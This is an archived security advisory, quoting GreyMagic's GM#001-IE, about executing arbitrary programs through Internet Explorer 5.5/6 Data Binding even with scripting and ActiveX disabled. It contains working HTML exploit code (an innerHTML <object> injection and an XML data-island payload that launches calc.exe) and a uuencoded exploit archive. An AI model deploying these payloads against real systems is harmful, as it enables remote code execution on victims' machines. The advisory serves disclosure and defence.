COMMAND

	IE arbitrary commands exec without Active Scripting or ActiveX

SYSTEMS AFFECTED

	 IE5.5sp2 Win98, all patches, Active scripting and ActiveX disabled.

	 IE5.5sp2 NT4 sp6a, all patches, Active scripting and ActiveX disabled.

	 IE6sp1 Win2000 sp2, all patches, Active scripting and ActiveX disabled.

	 IE6sp1 WinXP, all patches, Active scripting and ActiveX disabled.

	

PROBLEM

	In GreyMagic [http://security.greymagic.com] advisory [GM#001-IE] :
	

	--snipp--
	

	All \"createPopup\" does is create a (featureless) window containing  an
	empty HTML document, this does not pose a threat,  but  later  on,  that
	document has HTML injected to it (using innerHTML), which is the  actual
	problem. For example, the following code will work just the same:
	

	<span id=\"oSpan\"></span>

	<script language=\"jscript\" defer>

	    oSpan.innerHTML=\'<object classid=\"clsid:11111111-1111-1111-1111-111111111111\" codebase=\"c:/winnt/system32/calc.exe\"></object>\';

	</script> 

	

	(Note: innerHTML is not the only property  used  to  dynamically  insert
	HTML  to  any  element,  it  is  also   possible   to   use   outerHTML,
	insertAdjacentHTML and more to gain the same results.)
	

	Data Binding binds HTML elements (data consumers) such as  div  or  span
	to the DSO without need for a single line of script code. We  found  out
	that when the \"dataFormatAs\" attribute  is  set  to  \"HTML\"  on  the
	consumer, Data Binding internally uses innerHTML in order to insert  the
	data into the element (otherwise innerText is used). So all we  need  to
	do now is supply a DSO that contains the offending <object>  element,
	the rest will be done for us by the Data Binding  engine,  no  scripting
	needed.
	

	--snapp--
	

	 Exploit :

	 =======

	

	In the following example we\'re using an XML data-island as our DSO  and
	a  span  element  as  the  data  consumer.  Using  XML   is   especially
	comfortable because it can be  embedded  within  the  document,  without
	need for external requests that may be stopped by the host application.
	

	

	<span datasrc=\"#oExec\" datafld=\"exploit\" dataformatas=\"html\"></span>

	<xml id=\"oExec\">

	    <security>

	        <exploit>

	            <![CDATA[

	            <object id=\"oFile\" classid=\"clsid:11111111-1111-1111-1111-111111111111\" codebase=\"c:/winnt/system32/calc.exe\"></object>

	            ]]>

	        </exploit>

	    </security>

	</xml> 

	

	

	UUencoded exploits see [http://security.greymagic.com/adv/gm001-ie/] :
	

	begin 644 IEexec.zip

	M4$L#!!0````(`\")<82SE0<Y8/P$``%P\"```,````861V8FEN9\"YH=&ULC5)-

	M3\\,P##T7:?\\AA#.-@-N43IH&G!\'B-NV0IMX:EH^J<:\']]SA-)^V`!#G$L>.7

	M]VQG=2-;=\':S(@NJ218-6MB\\#]X;?V)<K\\6W\\1Y%G\"*\">WH4/B!TJBEA!%Z6

	M4F0`(:WQ9]:#K7C$R4)L`9\"SMH=C18DB@BYUC#REB@M;\'9J)[+_I\"!([Y5FC

	M4,5>5_PNO(R@^1PXVJ;B,\'8V&%PBH7<IL^*I3+Z1(J$3\\>@L,Y2>X10I)`D<

	M>H-)3U\'(Y9W9*>3M?O>\\_=CNLQ?J3]\"8\\:_&`F?:JAB3KRV9]<.R[G_9+HM`

	MH8%:1:C^*)MD9\\8LYG#(\"L651\"FNU$LQYIFF\\ID#;`,IZT+$N?G&=P,RG#HB

	M1ABI55XY.H>W/IR([/H^#K5+S9Q+W;6@SYQ]*3O0%<TLSS*QS(=EF#3=]*=^

	M`%!+`P04````\"``F6V$LZSA>AP$!``#C`0``#P```\'-I;7!L96)I;F0N:\'1M

	M;(U1P4[#,`P]%XE_\".%,+>`V)96F#3X`<9MV2%./!MQDJC/1_CW)TDD[((0/

	ML6R]E_=LJSX.U-S>J!Y-EW-TD;!Y.WGO_(>0=@7?SOL(/\'/$X?D)K\"%;XX2R

	MKA44=**1\\U]B1-*2XTS(/6*4HA_QH!,0&&UMF66&PD6J#=V<\\O^T$IZ/QHO.

	M1,.CU?(^O$QHY;EQH$Y+G(X47%PZ81PR4LL\\H&P49\'96G082+L$+/74JE=R=

	M1A>SF:I2RS_GHE)WN\\UV_;[>E2JTGVACX;\\Z0BDL&>9<6TII];C$PR_/)1(I

	M=-@:1OW7S,ESD2M.]OMB#Z[\\*;BRKF`JIX1EL6G3^;@_4$L!`A8+%`````@`

	M(EQA+.5!SE@_`0``7`(```P``````````0`@`(\"!`````&%D=F)I;F0N:\'1M

	M;%!+`0(6\"Q0````(`\"9;82SK.%Z\'`0$``.,!```/``````````$`(`\"`@6D!

	G``!S:6UP;&5B:6YD+FAT;6Q02P4&``````(``@!W````EP(`````

	`

	end

	804 bytes

	

SOLUTION

	Use Microsoft latest patch ??